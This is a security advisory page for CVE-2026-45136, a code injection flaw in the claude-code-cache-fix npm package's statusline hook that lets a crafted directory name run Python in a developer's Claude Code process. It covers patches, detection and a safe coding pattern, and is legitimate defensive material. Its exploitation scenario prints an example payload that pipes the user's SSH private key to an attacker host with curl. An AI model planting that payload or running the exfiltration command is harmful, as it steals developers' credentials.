CVE-2026-45136: claude-code-cache-fix: hook path injection → RCE
GHSA-g3xq-3gmv-qq8g | HIGH | CISA: TRACK*

CVE-2026-45136 is a code injection vulnerability in the npm package claude-code-cache-fix (v3.5.0–v3.5.1), where the statusline hook script interpolates user-controlled filesystem paths directly into a Python triple-quoted string literal — a directory name containing ''' closes the literal early and executes arbitrary Python in the developer's Claude Code process. Any developer running the recommended statusLine configuration is persistently exploitable: the hook fires on every terminal redraw, meaning compromise is sustained without further action after the initial trigger. The delivery vector is frictionless — a hostile directory name lands on disk via routine git clone, npm install, or zip extraction, requiring no privileges or network access beyond what a developer already performs daily. Upgrade to v3.5.2 immediately; if patching is not immediately possible, remove the statusLine entry from ~/.claude/settings.json as a workaround, and rotate all credentials accessible on affected developer machines.
What is the risk?
HIGH. While no remote vector exists, the delivery mechanism is trivial — any git repository, npm package, or archive can plant a hostile directory name. Exploitation requires zero specialized knowledge: crafting the payload is a one-liner, and the attack self-sustains on every terminal redraw without further adversary involvement. The target population is AI developers whose machines hold SSH keys, LLM API tokens (Anthropic, OpenAI), cloud provider credentials, and proprietary model artifacts — extremely high-value targets for supply chain actors. Six prior CVEs exist in the same package, suggesting this tool has a weak security track record.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Claude Code | npm | >= 3.5.0, < 3.5.2 | 3.5.2 |
Do you use Claude Code? You're affected.
What should I do?
5 steps:
1. Patch: upgrade claude-code-cache-fix to v3.5.2 (published 2026-05-07) — the fix rewrites stdin handling to use a single-quoted heredoc and env var, eliminating shell interpolation entirely.
2. Immediate workaround: remove the statusLine entry from ~/.claude/settings.json to disable the hook until patching is possible.
3. Alternative workaround: replace tools/quota-statusline.sh with the safe heredoc+env-var pattern (export CC_INPUT=$(cat); read JSON via os.environ in Python, never via string interpolation).
4. Detection: run npm list claude-code-cache-fix to identify versions 3.5.0 or 3.5.1; audit ~/.claude/settings.json for statusLine entries pointing to quota-statusline.sh.
5. Incident response: if confirmed vulnerable and timeline is unknown, treat as compromised — rotate SSH keys, all LLM API keys, cloud access tokens, and any credentials stored on the developer machine.
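The detection step above, scripted as an added example (not part of claude-code-cache-fix or this advisory). The function names, verdict words and sample data are constructed, and the settings check is a text heuristic that assumes the hook command sits inside the statusLine object.

```shell
#!/bin/sh
# Added example, not part of claude-code-cache-fix. Function names, verdict
# words and the sample data are constructed for illustration.
PKG=claude-code-cache-fix

# Read `npm list` text on stdin, print the first version found for $PKG.
installed_version() {
    sed -n "s/.*$PKG@\([0-9][0-9A-Za-z.+-]*\).*/\1/p" | head -n 1
}

# Affected releases named on this page: 3.5.0 and 3.5.1.
is_affected_version() {
    case "$1" in
        3.5.0|3.5.1) return 0 ;;
        *) return 1 ;;
    esac
}

# True when the settings file has a statusLine object mentioning the hook
# script. Text heuristic, assuming the command sits inside that object.
hook_configured() {
    [ -r "$1" ] || return 1
    tr -d '\n' < "$1" | grep -Eq '"statusLine"[^}]*quota-statusline\.sh'
}

# $1 = output of `npm list claude-code-cache-fix`, $2 = settings.json path.
# Prints EXPOSED (affected and hook wired), DORMANT (affected, hook not
# wired: still upgrade) or CLEAR (no affected version seen).
triage() {
    ver=$(printf '%s\n' "$1" | installed_version)
    if ! is_affected_version "$ver"; then
        echo CLEAR
    elif hook_configured "$2"; then
        echo EXPOSED
    else
        echo DORMANT
    fi
}

# Constructed sample: npm output text plus a throwaway settings file.
demo() {
    f=$(mktemp) || return 1
    printf '%s\n' '{"statusLine": {"type": "command",' \
        ' "command": "sh tools/quota-statusline.sh"}}' > "$f"
    triage '+-- claude-code-cache-fix@3.5.1' "$f"
    rm -f "$f"
}
# Real use: triage "$(npm list claude-code-cache-fix)" ~/.claude/settings.json
```

npm list inspects the current project only; add -g to check a global install.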
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
Is CVE-2026-45136 actively exploited?
No confirmed active exploitation of CVE-2026-45136 has been reported, but organizations should still patch proactively.
What systems are affected by CVE-2026-45136?
This vulnerability affects the following AI/ML architecture patterns: AI development environments, Agent frameworks, AI coding assistants.
What is the CVSS score for CVE-2026-45136?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
- AML.T0010.001 AI Software
- AML.T0010.005 AI Agent Tool
- AML.T0011 User Execution
- AML.T0050 Command and Scripting Interpreter
- AML.T0112.000 Local AI Agent

Compliance Controls Affected
What are the technical details?
Original Advisory
claude-code-cache-fix is a cache optimization proxy for Claude Code. From 3.5.0 to before 3.5.2, tools/quota-statusline.sh (introduced in v3.5.0) interpolates Claude Code's hook stdin payload directly into a Python triple-quoted string literal. A ''' byte sequence in any user-controlled field of the payload closes the literal early and lets following bytes execute as Python in the user's Claude Code process. This vulnerability is fixed in 3.5.2.
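The interpolation flaw the advisory describes, next to the heredoc plus environment-variable pattern this page names as the fix, as an added example (not the project's quota-statusline.sh). The function names, the printed output and the sample payload are constructed, the unsafe form is an assumed shape shown only in comments, and python3 is assumed to be on PATH.

```shell
#!/bin/sh
# Added example, not the project's script. Names and sample data are constructed.
#
# Unsafe shape the advisory describes (shown as text only, never executed):
#   input=$(cat)
#   python3 -c "import json; d = json.loads('''$input''')"
# The shell pastes $input into Python source, so a ''' inside any field ends
# the string literal and the bytes after it are parsed as Python code.

# Hardened shape: the payload travels as data in an environment variable and
# the Python source sits in a single-quoted heredoc the shell never expands.
render_statusline() (
    CC_INPUT=$(cat)      # read the hook payload from stdin exactly once
    export CC_INPUT
    python3 - <<'PY'
import json
import os

try:
    payload = json.loads(os.environ.get("CC_INPUT", ""))
except ValueError:
    payload = {}
if not isinstance(payload, dict):
    payload = {}
workspace = payload.get("workspace")
if not isinstance(workspace, dict):
    workspace = {}
cwd = workspace.get("current_dir") or payload.get("cwd") or "?"
# Emit the path as inert text; non-printable characters are masked so the
# value cannot drive the terminal either.
print("".join(c if c.isprintable() else "?" for c in str(cwd)))
PY
)

# Constructed payload: a directory name containing ''' (harmless text here).
sample_payload() {
    cat <<'JSON'
{"cwd": "/tmp/demo'''dir", "workspace": {"current_dir": "/tmp/demo'''dir"}}
JSON
}

sample_payload | render_statusline
```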
Exploitation Scenario
An attacker contributes to or publishes an open-source AI project (npm package, GitHub repo, or sample dataset archive) that includes a directory named with a crafted payload such as: 'payload_dir/\'''+__import__(\"os\").popen(\"cat ~/.ssh/id_rsa | curl -d @- attacker.com\").read()+\''''. A developer on v3.5.0 or v3.5.1 installs or clones the project as part of normal AI development workflow. The moment the developer navigates their terminal to any workspace where the hostile path appears in cwd, workspace.current_dir, workspace.project_dir, or transcript_path fields of the hook payload, Claude Code fires the statusline hook. Python interprets the injected bytes as code, silently exfiltrates the developer's SSH private key, and the payload continues executing on every subsequent terminal redraw for the entire session.
Weaknesses (CWE)
- CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (Primary)
- CWE-94 Improper Control of Generation of Code ('Code Injection') (Primary)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
- [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
References
- github.com/advisories/GHSA-g3xq-3gmv-qq8g
- github.com/cnighswonger/claude-code-cache-fix/commit/613e4df30547f3e6baf32d161eddc828f171da17
- github.com/cnighswonger/claude-code-cache-fix/issues/108
- github.com/cnighswonger/claude-code-cache-fix/pull/110
- github.com/cnighswonger/claude-code-cache-fix/security/advisories/GHSA-g3xq-3gmv-qq8g
Related Vulnerabilities
- CVE-2026-2611 9.6 MLflow: cross-origin bypass enables RCE via AI agent. Same package: claude-code
- CVE-2026-7574 8.7 Claude Desktop: VM integrity bypass enables RCE. Same package: claude-code
- CVE-2026-35020 8.4 Claude Code CLI: OS command injection via TERMINAL env. Same package: claude-code
- CVE-2026-44246 7.2 nnU-Net: prompt injection hijacks CI/CD triage agent. Same package: claude-code
- CVE-2026-47128 6.1 nono-cli: sandbox escape via Unix socket bypass. Same package: claude-code